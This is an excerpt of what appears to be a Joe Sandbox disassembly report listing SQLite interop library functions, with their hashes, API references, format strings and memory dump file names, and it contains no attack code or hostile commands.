                                                                                                                                                                                                                                      • Instruction ID: ac8172a7f58690d1af773b06cf39a5ee65dc4cf605d60a81fe0ff0fd44d808da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c06fa9dfaf6e67ef3c87ffc1ff66832d9a009fc5eb505ab4b709beb72933011
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B11E5B3B101156BDB009A6D9C05E6BBB58AF81764F048066FD18DB301F72CFA719BE5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(JSON path error near '%q',?), ref: 6BC3FAC7
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC3FAF0
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP ref: 6BC3FB00
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • JSON path error near '%q', xrefs: 6BC3FAC2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I1bf8975e567ea97a.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: JSON path error near '%q'
                                                                                                                                                                                                                                      • API String ID: 2784778010-481711382
                                                                                                                                                                                                                                      • Opcode ID: e5784e2a4c9717e49b584cfa2d1684093d0dcbcd3d51438413a05e01c93681b7
                                                                                                                                                                                                                                      • Instruction ID: 87b6ccab20aa0dda5425c5254515550691a69e71abb60f982967ef54d84e1687
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5784e2a4c9717e49b584cfa2d1684093d0dcbcd3d51438413a05e01c93681b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E01BEB19792212AE71457685C02F7772C89F4162CF500769FC79972C1FBA99A1482E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC55E84
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55E75
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC55E7F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 0-160653349
                                                                                                                                                                                                                                      • Opcode ID: 031bf3bd4f69581db106357e1f1334e3967a945b83c6721744d5ac9a8a0c630b
                                                                                                                                                                                                                                      • Instruction ID: bc37d01425a7c39abf46bd4cf7daf673e575ecbfef9ebcdc38ef9cd72da6f6b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 031bf3bd4f69581db106357e1f1334e3967a945b83c6721744d5ac9a8a0c630b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C112573A193445BC710DF9CA88189AF7D4FB44621F4006AEFE9C9B241E7349A2483E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000062A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC6F1E7,6BD15CA8,00000001,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC5601F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC56018
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56009
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC56013
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 90c66c753da93cce1f77602d66ff707c201b63c55777c9a375929904836b519f
                                                                                                                                                                                                                                      • Instruction ID: abd374ee4d91dbda7109a1e5a5057c733f919b605ee0a04f86208626c7f8d524
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90c66c753da93cce1f77602d66ff707c201b63c55777c9a375929904836b519f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01114C72921A005BE7109F259806A1B7B649BC1B79F004078E91D9B341FB3DD2358BBE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000357BC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?), ref: 6BC6D536
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6D52F
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC6D52A
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6D520
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 30b163e4c1269828cf859de300b642b245e267e909e72300f07d18ea6734cb42
                                                                                                                                                                                                                                      • Instruction ID: 52b6b2d9ed5b6190f176147d9d033b590848c482dd00d4d049e370073bbb0a38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30b163e4c1269828cf859de300b642b245e267e909e72300f07d18ea6734cb42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C211E5F1969115ABDB00DF54CC81F6A7768EF41788F204095FC1A9B551FB38DB44C6A2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001141D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5464B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5463E
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC54639
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5462F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 7d0124f1204b869eca80bda6339f004389bbcb32a82d317c1e4df4fbac88e198
                                                                                                                                                                                                                                      • Instruction ID: 7f40268abc3febd8aa27b03069a4de49484d507cee32dd808469d0b9656a56c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d0124f1204b869eca80bda6339f004389bbcb32a82d317c1e4df4fbac88e198
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A611A071A052009FC300DF68C885B56BBE4DB41318F5481D9E81C9F246FB77E962CBE2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AE43,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC574FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC574F3
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC574E4
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC574EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 61e0d5cb86a205084ebcf98ab28ef8456a430dfae79fc39797e2476c056d88d4
                                                                                                                                                                                                                                      • Instruction ID: 97d0687bad42dfe631492e1304135840eddb2b953af846f7e114fee9f59563dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61e0d5cb86a205084ebcf98ab28ef8456a430dfae79fc39797e2476c056d88d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55014E33B182051BE6044F1AF84196A779AEBC0735794416FEA298B2C0FB25F5B116D8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABA1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57BA8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57BA1
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57B92
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 00ff59cb5b58375b1cdd41b527ee0e8c08eee3531f07200b4a036d2d8870a12d
                                                                                                                                                                                                                                      • Instruction ID: 798b89a124e48e0b0a01d38c981385a370678ccef4d15743f2a9f2c53d125a71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00ff59cb5b58375b1cdd41b527ee0e8c08eee3531f07200b4a036d2d8870a12d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701D472B157155BDB009F799C05F4B37A4AF00719B0080AAFD9EEB201F628E67087A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AB89,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57C38
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57C31
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57C22
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57C2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 365abc3d0cb56df94a537f85a8dd67b1a3371c75dc576ee7302e2c875d6056c4
                                                                                                                                                                                                                                      • Instruction ID: f20f11fb9b7e3b0220f5067267a342615ed8cd1cdc791ee9eebe70496d62616e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 365abc3d0cb56df94a537f85a8dd67b1a3371c75dc576ee7302e2c875d6056c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A0184B2B107105BDB109F799801A87B7989F41625F00446AEA5EEB341EA38F52487A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B599,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC570D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC570D1
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC570C2
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC570CC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 807833c2053e3efb80140ceda6674d10e60345ec29f1177926362fbb362bbfc6
                                                                                                                                                                                                                                      • Instruction ID: b13bdb1f606a24ae06be0e76b736ff97ca1405f1589d9324a334301d116c96ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 807833c2053e3efb80140ceda6674d10e60345ec29f1177926362fbb362bbfc6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001D1723202045BD7009B79EC05B9737DC9B407A8F0480A2E90DCF242FB29EA7093A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011F6E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,00000000,?,6BC680AE,?), ref: 6BC63713
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6370C
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC63707
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC636FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 0d70748de8ab59278670871cdbc1ce4841cdd80923cbaca8dcf67f2045324dc6
                                                                                                                                                                                                                                      • Instruction ID: 06dbff56e36222908b0d521a363ba08db3af0b57653bacd81fe1ebebccf2c910
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d70748de8ab59278670871cdbc1ce4841cdd80923cbaca8dcf67f2045324dc6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D801472215C1602AD204DF38ADC1E62BFA9CF5826C72841EDE2089F293F623D50383A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC8C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,6BC6FC50,?,00000000,00000000,?), ref: 6BC5787A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57873
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57864
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5786E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
